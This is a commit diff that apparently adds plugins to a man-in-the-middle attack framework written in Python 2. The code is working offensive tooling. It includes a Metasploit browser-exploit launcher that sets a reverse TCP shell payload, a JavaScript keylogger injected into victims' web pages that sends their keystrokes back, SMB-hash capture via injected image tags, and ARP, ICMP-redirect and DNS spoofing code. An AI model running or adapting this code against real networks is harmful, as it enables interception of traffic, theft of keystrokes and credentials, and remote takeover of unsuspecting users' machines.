logging.info('%s >> %s exploit already started' % (vic_ip, exploit))
url = info['uripath'] #get the url assigned to the exploit
self.injectWait(msf, url, vic_ip)
else: #here we setup the exploit
rand_url = self.rand_url() # generate a random url
rand_port = random.randint(1000, 65535) # generate a random port for the payload listener
#generate the command string to send to the virtual console
#new line character very important as it simulates a user pressing enter
cmd = "use exploit/multi/browser/%s\n" % exploit
cmd += "set SRVPORT %s\n" % self.msfport
cmd += "set URIPATH %s\n" % rand_url
cmd += "set PAYLOAD generic/shell_reverse_tcp\n" #chose this payload because it can be upgraded to a full-meterpreter (plus its multi-platform! Yay java!)
cmd += "set LHOST %s\n" % self.msfip
cmd += "set LPORT %s\n" % rand_port
cmd += "exploit -j\n"
logging.debug("command string:\n%s" % cmd)
try:
logging.info("%s >> sending commands to metasploit" % vic_ip)
#Create a virtual console
console_id = msf.call('console.create')['id']
#write the cmd to the newly created console
msf.call('console.write', [console_id, cmd])
logging.info("%s >> commands sent succesfully" % vic_ip)
except Exception, e:
logging.info('%s >> Error accured while interacting with metasploit: %s:%s' % (vic_ip, Exception, e))
self.injectWait(msf, rand_url, vic_ip)
else:
logging.info("%s >> client is not vulnerable to any java exploit" % vic_ip)
self.sploited_ips.append(vic_ip)
sleep(0.5)
else:
sleep(0.5)
else:
sleep(0.5)
def add_options(self, options):
options.add_argument('--msfip', dest='msfip', help='IP Address of MSF')
options.add_argument('--msfport', dest='msfport', default='8080', help='Port of MSF web-server [default: 8080]')
options.add_argument('--rpcip', dest='rpcip', default='127.0.0.1', help='IP of MSF MSGRPC server [default: localhost]')
options.add_argument('--rpcpass', dest='rpcpass', default='abc123', help='Password for the MSF MSGRPC server [default: abc123]')
options.add_argument('--javapwncfg', type=file, help='Specify a config file')
def finish(self):
'''This will be called when shutting down'''
msf = msfrpc.Msfrpc({"host": self.rpcip})
msf.login('msf', self.rpcpass)
jobs = msf.call('job.list')
if len(jobs) > 0:
print '[*] Stopping all running metasploit jobs'
for k,v in jobs.items():
msf.call('job.stop', [k])
consoles = msf.call('console.list')['consoles']
if len(consoles) > 0:
print "[*] Closing all virtual consoles"
for console in consoles:
msf.call('console.destroy', [console['id']])

108
plugins/JsKeylogger.py Normal file
View file

@ -0,0 +1,108 @@
from plugins.plugin import Plugin
from plugins.Inject import Inject
import logging
class jskeylogger(Inject, Plugin):
name = "Javascript Keylogger"
optname = "jskeylogger"
desc = "Injects a javascript keylogger into clients webpages"
implements = ["handleResponse","handleHeader","connectionMade", "sendPostData"]
has_opts = False
def initialize(self,options):
Inject.initialize(self, options)
self.html_payload = self.msf_keylogger()
print "[*] Javascript Keylogger plugin online"
def sendPostData(self, request):
#Handle the plugin output
if 'keylog' in request.uri:
keys = request.postData.split(",")
del keys[0]; del(keys[len(keys)-1])
nice = ''
for n in keys:
if n == '9':
nice += "<TAB>"
elif n == '8':
nice = nice.replace(nice[-1:], "")
elif n == '13':
nice = ''
else:
try:
nice += n.decode('hex')
except:
logging.warning("%s ERROR decoding char %s" % (request.client.getClientIP(), n))
logging.warning("%s [%s] Keys: %s" % (request.client.getClientIP(), request.headers['host'], nice))
def msf_keylogger(self):
#Stolen from the Metasploit module http_javascript_keylogger
payload = """<script type="text/javascript">
window.onload = function mainfunc(){
var2 = ",";
function make_xhr(){
var xhr;
try {
xhr = new XMLHttpRequest();
} catch(e) {
try {
xhr = new ActiveXObject("Microsoft.XMLHTTP");
} catch(e) {
xhr = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}
if(!xhr) {
throw "failed to create XMLHttpRequest";
}
return xhr;
}
xhr = make_xhr();
xhr.onreadystatechange = function() {
if(xhr.readyState == 4 && (xhr.status == 200 || xhr.status == 304)) {
eval(xhr.responseText);
}
}
if (window.addEventListener) {
document.addEventListener('keypress', function2, true);
document.addEventListener('keydown', function1, true);
} else if (window.attachEvent) {
document.attachEvent('onkeypress', function2);
document.attachEvent('onkeydown', function1);
} else {
document.onkeypress = function2;
document.onkeydown = function1;
}
}
function function2(e){
var3 = (window.event) ? window.event.keyCode : e.which;
var3 = var3.toString(16);
if (var3 != "d"){
function3(var3);
}
}
function function1(e){
var3 = (window.event) ? window.event.keyCode : e.which;
if (var3 == 9 || var3 == 8 || var3 == 13){
function3(var3);
}
}
function function3(var3){
var2 = var2 + var3 + ",";
xhr.open("POST", "keylog", true);
xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xhr.send(var2);
if (var3 == 13 || var2.length > 3000)
var2 = ",";
}
</script>"""
return payload

79
plugins/Replace.py Normal file
View file

@ -0,0 +1,79 @@
import os,subprocess,logging,time,re
import argparse
from plugins.plugin import Plugin
from plugins.CacheKill import CacheKill
class Replace(CacheKill,Plugin):
name = "Replace"
optname = "replace"
implements = ["handleResponse","handleHeader","connectionMade"]
has_opts = True
desc = "Replace arbitrary content in HTML content"
def initialize(self,options):
self.options = options
self.search_str = options.search_str
self.replace_str = options.replace_str
self.regex_file = options.regex_file
if (self.search_str==None or self.search_str=="") and self.regex_file is None:
sys.exit("[*] Please provide a search string or a regex file")
self.regexes = []
if self.regex_file is not None:
print "[*] Loading regexes from file"
for line in self.regex_file:
self.regexes.append(line.strip().split("\t"))
if self.options.keep_cache:
self.implements.remove("handleHeader")
self.implements.remove("connectionMade")
self.ctable = {}
self.dtable = {}
self.mime = "text/html"
print "[*] Replace plugin online"
def handleResponse(self,request,data):
ip,hn,mime = self._get_req_info(request)
if self._should_replace(ip,hn,mime):
if self.search_str!=None and self.search_str!="":
data = data.replace(self.search_str, self.replace_str)
logging.info("%s [%s] Replaced '%s' with '%s'" % (request.client.getClientIP(), request.headers['host'], self.search_str, self.replace_str))
# Did the user provide us with a regex file?
for regex in self.regexes:
try:
data = re.sub(regex[0], regex[1], data)
logging.info("%s [%s] Occurances matching '%s' replaced with '%s'" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))
except Exception, e:
logging.error("%s [%s] Your provided regex (%s) or replace value (%s) is empty or invalid. Please debug your provided regex(es)" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))
self.ctable[ip] = time.time()
self.dtable[ip+hn] = True
return {'request':request,'data':data}
return
def add_options(self,options):
options.add_argument("--search-str",type=str,default=None,help="String you would like to replace --replace-str with. Default: '' (empty string)")
options.add_argument("--replace-str",type=str,default="",help="String you would like to replace.")
options.add_argument("--regex-file",type=file,help="Load file with regexes. File format: <regex1>[tab]<regex2>[new-line]")
options.add_argument("--keep-cache",action="store_true",help="Don't kill the server/client caching.")
def _should_replace(self,ip,hn,mime):
return mime.find(self.mime)!=-1
def _get_req_info(self,request):
ip = request.client.getClientIP()
hn = request.client.getRequestHostname()
mime = request.client.headers['Content-Type']
return (ip,hn,mime)

22
plugins/SMBAuth.py Normal file
View file

@ -0,0 +1,22 @@
from plugins.plugin import Plugin
from plugins.Inject import Inject
class SMBAuth(Inject,Plugin):
name = "SMBAuth"
optname = "smbauth"
desc = "Evoke SMB challenge-response auth attempts"
def initialize(self,options):
Inject.initialize(self,options)
self.target_ip = options.host
self.html_payload = self._get_data()
print "[*] SMBAuth plugin online"
def add_options(self,options):
options.add_argument("--host", type=str, help="The ip address of your capture server")
def _get_data(self):
return '<img src=\"\\\\%s\\image.jpg\">'\
'<img src=\"file://///%s\\image.jpg\">'\
'<img src=\"moz-icon:file:///%%5c/%s\\image.jpg\">'\
% tuple([self.target_ip]*3)

218
plugins/Spoof.py Normal file
View file

@ -0,0 +1,218 @@
#
# DNS Spoofing code has been stolen from https://github.com/DanMcInerney/dnsspoof/
#
from twisted.internet import reactor
from twisted.internet.interfaces import IReadDescriptor
from plugins.plugin import Plugin
from time import sleep
import nfqueue
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import *
import os
import sys
import threading
try:
from configobj import ConfigObj
except:
sys.exit('[-] configobj library not installed!')
class Spoof(Plugin):
name = "Spoof"
optname = "spoof"
desc = 'Redirect traffic using ICMP, ARP or DNS'
has_opts = True
def initialize(self,options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.interface = options.interface
self.arp = options.arp
self.icmp = options.icmp
self.dns = options.dns
#self.dhcp = options.dhcp
self.domain = options.domain
self.dnsip = options.dnsip
self.dnscfg = options.dnscfg
self.gateway = options.gateway
self.summary = options.summary
self.target = options.target
self.arpmode = options.arpmode
self.port = self.options.listen
self.debug = False
self.send = True
if os.geteuid() != 0:
sys.exit("[-] Spoof plugin requires root privileges")
if self.options.log_level == 'debug':
self.debug = True
print "[*] Spoof plugin online"
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
if self.arp == True:
if self.icmp == True:
sys.exit("[-] --arp and --icmp are mutually exclusive")
if (not self.interface or not self.gateway):
sys.exit("[-] ARP Spoofing requires --gateway and --iface")
self.mac = get_if_hwaddr(self.interface)
self.routermac = getmacbyip(self.gateway)
print "[*] ARP Spoofing enabled"
if self.arpmode == 'req':
pkt = self.build_arp_req()
elif self.arpmode == 'rep':
pkt = self.build_arp_rep()
elif self.icmp == True:
if self.arp == True:
sys.exit("[-] --icmp and --arp are mutually exclusive")
if (not self.interface or not self.gateway or not self.target):
sys.exit("[-] ICMP Redirection requires --gateway, --iface and --target")
self.mac = get_if_hwaddr(self.interface)
self.routermac = getmacbyip(self.gateway)
print "[*] ICMP Redirection enabled"
pkt = self.build_icmp()
if self.summary == True:
pkt.show()
ans = raw_input('\n[*] Continue? [Y|n]: ').lower()
if ans == 'y' or len(ans) == 0:
pass
else:
sys.exit(0)
if self.dns == True:
if not self.dnscfg:
if (not self.dnsip or not self.domain):
sys.exit("[-] DNS Spoofing requires --domain, --dnsip")
elif self.dnscfg:
self.dnscfg = ConfigObj(self.dnscfg)
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
print "[*] DNS Spoofing enabled"
self.start_dns_queue()
print '[*] Setting up ip_forward and iptables'
file = open('/proc/sys/net/ipv4/ip_forward', 'w')
file.write('1')
file.close()
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % self.port)
t = threading.Thread(name='send_packets', target=self.send_packets, args=(pkt,self.interface,self.debug,))
t.setDaemon(True)
t.start()
def send_packets(self,pkt,interface, debug):
while self.send == True:
sendp(pkt, inter=2, iface=interface, verbose=debug)
def build_icmp(self):
pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=get_if_addr(self.interface))/\
IP(src=self.target, dst=self.gateway)/UDP()
return pkt
def build_arp_req(self):
if self.target == None:
pkt = Ether(src=self.mac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mac, psrc=self.gateway, pdst=self.gateway)
elif self.target:
target_mac = getmacbyip(self.target)
if target_mac == None:
sys.exit("[-] Error: Could not resolve targets MAC address")
pkt = Ether(src=self.mac, dst=target_mac)/ARP(hwsrc=self.mac, psrc=self.gateway, hwdst=target_mac, pdst=self.target)
return pkt
def build_arp_rep(self):
if self.target == None:
pkt = Ether(src=self.mac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mac, psrc=self.gateway, op=2)
elif self.target:
target_mac = getmacbyip(self.target)
if target_mac == None:
sys.exit("[-] Error: Could not resolve targets MAC address")
pkt = Ether(src=self.mac, dst=target_mac)/ARP(hwsrc=self.mac, psrc=self.gateway, hwdst=target_mac, pdst=self.target, op=2)
return pkt
def nfqueue_callback(self, i, payload):
data = payload.get_data()
pkt = IP(data)
if not pkt.haslayer(DNSQR):
payload.set_verdict(nfqueue.NF_ACCEPT)
else:
if self.dnscfg:
for k,v in self.dnscfg.items():
if k in pkt[DNS].qd.qname:
self.modify_dns(payload, pkt, v)
elif self.domain in pkt[DNS].qd.qname:
self.modify_dns(payload, pkt, self.dnsip)
def modify_dns(self, payload, pkt, ip):
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=ip))
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt))
logging.info("%s Spoofed DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
def start_dns_queue(self):
self.q = nfqueue.queue()
self.q.set_callback(self.nfqueue_callback)
self.q.fast_open(0, socket.AF_INET)
self.q.set_queue_maxlen(5000)
reactor.addReader(self)
self.q.set_mode(nfqueue.NFQNL_COPY_PACKET)
def fileno(self):
return self.q.get_fd()
def doRead(self):
self.q.process_pending(100)
def connectionLost(self, reason):
reactor.removeReader(self)
def logPrefix(self):
return 'queue'
def add_options(self,options):
options.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP Spoofing')
options.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP Redirects')
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Redirect DNS requests')
# options.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using fake DHCP offers')
options.add_argument('--iface', dest='interface', help='Specify the interface to use')
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')
options.add_argument('--arpmode', dest='arpmode', default='req', help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]')
options.add_argument('--summary', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning')
options.add_argument('--domain', type=str, dest='domain', help='Domain to spoof [e.g google.com]')
options.add_argument('--dnsip', type=str, dest='dnsip', help='IP address to resolve dns queries to')
options.add_argument("--dnscfg", type=file, help="Specify a config file")
def finish(self):
self.send = False
sleep(3)
print '\n[*] Resetting ip_forward and iptables'
file = open('/proc/sys/net/ipv4/ip_forward', 'w')
file.write('0')
file.close()
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
if self.dns == True:
self.q.unbind(socket.AF_INET)
self.q.close()
if self.arp == True:
print '[*] Re-arping network'
pkt = Ether(src=self.routermac, dst='ff:ff:ff:ff:ff:ff')/ARP(psrc=self.gateway, hwsrc=self.routermac, op=2)
sendp(pkt, inter=1, count=5, iface=self.interface)

View file

@ -0,0 +1,47 @@
import logging
from cStringIO import StringIO
from plugins.plugin import Plugin
class Upsidedownternet(Plugin):
name = "Upsidedownternet"
optname = "upsidedownternet"
desc = 'Flips images 180 degrees'
has_opts = False
implements = ["handleResponse","handleHeader"]
def initialize(self,options):
from PIL import Image,ImageFile
globals()['Image'] = Image
globals()['ImageFile'] = ImageFile
self.options = options
def handleHeader(self,request,key,value):
'''Kill the image skipping that's in place for speed reasons'''
if request.isImageRequest:
request.isImageRequest = False
request.isImage = True
request.imageType = value.split("/")[1].upper()
def handleResponse(self,request,data):
try:
isImage = getattr(request,'isImage')
except AttributeError:
isImage = False
if isImage:
try:
image_type=request.imageType
#For some reason more images get parsed using the parser
#rather than a file...PIL still needs some work I guess
p = ImageFile.Parser()
p.feed(data)
im = p.close()
im=im.transpose(Image.ROTATE_180)
output = StringIO()
im.save(output,format=image_type)
data=output.getvalue()
output.close()
logging.info("Flipped image")
except Exception as e:
print "Error: %s" % e
return {'request':request,'data':data}

View file

@ -1,3 +1,6 @@
#Hack grabbed from http://stackoverflow.com/questions/1057431/loading-all-modules-in-a-folder-in-python
#Has to be a cleaner way to do this, but it works for now
import os
import glob
__all__ = [ os.path.basename(f)[:-3] for f in glob.glob(os.path.dirname(__file__)+"/*.py")]

Some files were not shown because too many files have changed in this diff Show more